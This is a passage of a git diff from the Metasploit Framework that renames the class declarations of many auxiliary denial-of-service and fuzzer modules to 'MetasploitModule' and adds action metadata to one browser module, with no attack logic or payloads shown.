+++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 34a5af994f..f7154392e6 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index a550c617b1..29c49031b9 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/struct2' require 'rex/proto/smb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb index e4aa509cd1..9eeeadf3ed 100644 --- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb +++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 10cfb38841..dab3f2bda3 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 76e35d1b59..6317644378 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -17,7 +17,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/scada/igss9_dataserver.rb b/modules/auxiliary/dos/scada/igss9_dataserver.rb index a97481a1af..debb192254 100644 --- a/modules/auxiliary/dos/scada/igss9_dataserver.rb +++ b/modules/auxiliary/dos/scada/igss9_dataserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 4149967eaf..4badcfb019 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 86fc52f7f2..e6b422ee8c 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos 
diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 3ec73403ae..ec9d7a1492 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2dddf9a25f..e045bd5348 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index 78ad298e42..c1939e64e4 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 76f0db506d..70ac830a9e 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -6,7 +6,7 @@ # auxilary/dos/ssl/openssl_aesni require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index c9704300cb..036d5708b4 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb 
+++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index a44a526850..d2b27eecd1 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 0ba1568205..9243b54a8d 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb index cee1464fe9..fa074f33a7 100644 --- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb +++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 9dfea04d72..f239bce52f 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos 
diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 18ac1c4212..5ad8dc5493 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML @@ -28,6 +28,9 @@ class Metasploit3 < Msf::Auxiliary [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer', 'DisclosureDate' => 'Nov 10 2009' )) register_options([ diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 5686914817..570ef3994d 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index b082718fe9..78e2cbfc31 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index 8a2a932f4f..7b62702876 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index ac1e6022f9..8cccf0ebb4 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index dc8ec4092e..415e837c28 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index b2288b7b1c..59b12e6922 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index e97dc9134f..960caad59d 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos 
diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 4db6db9836..f83dbc13dc 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index b948914501..fc65243095 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index db9d2e31c5..3e6f11f24c 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ed94c74c86..e93a079cfc 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index c2fddc489a..19130361c1 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb 
+++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index c1003c6a87..517ce4a0c8 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index daf6ad587d..2dfb95de64 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index afb0eda518..f8be0ff9d5 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 09189c625e..d251700318 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index 61ea317635..a64a28454f 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 79d649c253..e1e0065efc 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index fffd69b8dd..29ec0f804c 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index f60c224d7d..d5a480e758 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 65d494e2a3..7b51b4ae98 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 78ebe1e3af..6763919a40 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index fe436b7ef0..41a1ad0808 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 692d3080de..08c0cb47db 100644 
--- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index 25fec756b7..5cff79cdfd 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 51fa2bab02..46aaf309f2 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 2ba38d2064..1b6a17314a 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC 
diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index d514712000..70abc3470a 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 72166cc782..97e837d932 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index de18f018d1..1729724e16 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 81f16d4860..6f15b331b3 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos 
diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 7be42e23eb..9c11bf9139 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 9eeb6b614a..a04ee8e064 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index fa78ad8a42..3cb3a0a4a3 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index 63c678cc06..edbef44b07 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index ee3f9bd317..f56c69f873 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index 2d81a8f2c6..134bb40878 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'bit-struct' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index f28388b2f2..d351b927a6 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::TcpServer diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 00cf7bcdf5..6901b150b8 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index b115f6dd62..737baefe67 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -11,7 +11,7 